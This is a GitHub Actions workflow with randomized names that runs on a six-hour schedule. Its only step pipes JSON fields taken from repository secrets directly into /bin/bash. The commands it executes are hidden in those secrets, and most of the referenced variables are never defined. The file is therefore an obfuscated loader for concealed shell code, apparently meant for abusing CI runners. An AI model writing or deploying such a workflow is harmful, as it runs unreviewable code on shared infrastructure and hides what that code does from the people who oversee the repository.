name: maxiaoyu1827

on:
  workflow_dispatch:
  schedule:
    - cron: '10 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: maxiaoyu1827
        env:
          be34068: ${{ secrets.be34068 }}
        run: |
          echo $be34068 | jq -r .lpyh5029 | /bin/bash
          echo $kim39465 | jq -r .worgi179 | /bin/bash
          echo $ajkak55838 | jq -r .yc288 | /bin/bash
          echo $iwivm44 | jq -r .wwr27370 | /bin/bash
          echo $vgfvg2303 | jq -r .bc15 | /bin/bash
          echo $epn2 | jq -r .cwfff02362 | /bin/bash
          echo $bmxep79050 | jq -r .j70 | /bin/bash
          echo $vurlu701 | jq -r .ei9198 | /bin/bash
          echo $py5608 | jq -r .pyrk45 | /bin/bash
          echo $l21 | jq -r .hvan10903 | /bin/bash
          echo $npnk8821 | jq -r .lolc0 | /bin/bash
          echo $wpmh070 | jq -r .o00 | /bin/bash
          echo $vxb63 | jq -r .hrkc2 | /bin/bash
          echo $zmu58209 | jq -r .xybbv382 | /bin/bash

